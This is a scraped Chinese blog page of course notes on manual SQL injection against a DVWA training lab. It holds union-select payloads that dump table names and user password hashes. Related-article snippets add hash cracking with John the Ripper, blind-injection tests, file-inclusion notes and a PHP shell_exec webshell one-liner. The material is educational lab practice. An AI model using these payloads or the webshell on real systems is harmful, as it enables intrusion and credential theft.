手动漏洞挖掘-SQL注入(安全牛笔记)

substring_index(USER(),"@",l)--    #是将查询出来的结果进行切分，以@符号的方式切分
’ union select table_name,table_schema from information_schema.tables-- +   #查询数据库中所有的库表

查询所有数据库，数据表：
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id=‘+union+select+table_name,table_schema+from+information_schema.tables--+‘
&Submit=Submit#

统计每个数据库中表的数量：
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id=‘+union+select+table_schema,count(*)+from+information_schema.tables group by table_schema--+‘
&Submit=Submit#

查询每个库中对应的表：
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id=‘+union+select+table_name,table_schema from+information_schema.tables where table_schema=‘dvwa‘--+‘
&Submit=Submit#

查询user表中所有的列：
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id=‘+union+select+table_name,column_name from+information_schema.columns where table_schema=‘dvwa‘ and table_name=‘users‘--+‘
&Submit=Submit#

查询user表中的用户和密码：
http://192.168.100.129/dvwa/vulnerabilities/sqli/
?id=‘+union+select+user_id,password from dvwa.users --+‘
&Submit=Submit#

原文地址：https://www.cnblogs.com/pythonal/p/8675500.html

时间： 2024-10-11 13:19:22

手动漏洞挖掘-SQL注入(安全牛笔记)的相关文章

【安全牛学习笔记】手动漏洞挖掘-SQL注入

[email protected]:~# john --format=raw-MD5 dvwa.txt [email protected]:~# cd .john/ [email protected]:~/.john# ls john.log john.pot [email protected]:~/.john# cat john.log [email protected]:~/.john# cat john.pot [email protected]:~/.john# rm *

【安全牛学习笔记】手动漏洞挖掘-SQL盲注

手动漏洞挖掘-----SQL盲注不显示数据库内建的报错信息内建的报错信息帮助开发人员发现和修复问题报错信息提供关于系统的大量有用信息当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,sql注入将无法依据报错信息判断注入语句的执行结果,即盲思路:既然无法基于报错信息判断结果,基于逻辑真假的不同结果来判断 1'and 1=1--+ 1'and 1=2--+ select * from table_name where id='1' orderby 2--'; 课时91 手动漏洞挖

【安全牛学习笔记】KALI版本更新（第一个ROLLING RELEASE）和手动漏洞挖掘（SQL注入）

KALI版本更新-----第一个ROLLING RELEASE Kali 2.0发布时声称将采用rolling release模式更新(但并未实施) Fixed-release 固定发布周期使用软件稳定的主流版本发布-----主流-----作废更稳定,适合于企业生产环境 Rolling release 使用于开发者和技术人员连续升级新版本,追求在新功能出现后最快使用正在成为流行 KALI版本更新-----第一个ROLLING RELEASE Kali 2.0 rolling relea

【安全牛学习】笔记手动漏洞挖掘（三）

手动漏洞挖掘 Directory travarsal / File include(有区别/没区别) 目录权限限制不严 / 文件包含 /etc/php5/cgi/php.ini allow_url_include = on 应用程序功能操作文件,限制不严时导致访问WEB目录以外的文件读.写文件.远程执行代码特征但不绝对 ?page=a.php ?home=b.html ?file=content [email protected]:~$ ifconfig [email protected]:

【安全牛学习笔记】答疑（Conky、Goagent、Linux4.4内核发布）,手动漏洞挖掘

问答 Conky https://weather.yahoo.com/ conkyrc beijing: 2151330 Goagent 不要启动多次 Win+M Linux 4.4内核发布,在虚拟机中可使用主机上的GPU [email protected]:~# vi .conkyrc ${execi 300 curl -s "http://weather.yahoapis.com/forecastrss?w=2151330=c" -o ~/.cache/weather.xml} 打

【安全牛学习笔记】手动漏洞挖掘（四）

手动漏洞挖掘本地文件包含lfi 查看文件代码执行 <?php echo shell_exec($_GET['cmd']);?> Apache access.log 远程文件包含rfi 出现概率少于lfi,但更容易被利用 /usr/share/wfuzz/wordlist/vulns/ 手动漏洞挖掘文件上传漏洞 <?php echo shell_exec($_GET['cmd']);?> 直接上传webshell 修改文件类型上传webshell Mimetype----文件头

【安全牛学习笔记】手动漏洞挖掘（二）

手动漏洞挖掘身份认证常用弱口令/基于字典的密码破爆破锁定账号信息收集手机号密码错误提示信息密码嗅探手动漏洞挖掘会话sessionID Xss / cookie importer SessionID in URL 嗅探 sessionID长期不变 / 永久不变 sessionID生成算法 Sequencer 私有算法预判下一次登录时生成的SessionID 登出后返回测试手动漏洞挖掘密码找回 https://www.example.com/[email protected]

【安全牛学习笔记】手动漏洞挖掘（三）

小白日记37：kali渗透测试之Web渗透-手动漏洞挖掘（三）-目录遍历、文件包含

手动漏洞挖掘漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/www/]之外的其他操作系统文件(如:/etc/passwd/).形成根源:目录权限限制不严格 #File include文件包含[1.include本地文件包含LFI:2.远程系统文件包含RFI(可传入木马)] 通常为如include函数,可以将web根目录以外的目录包含进来.根源:include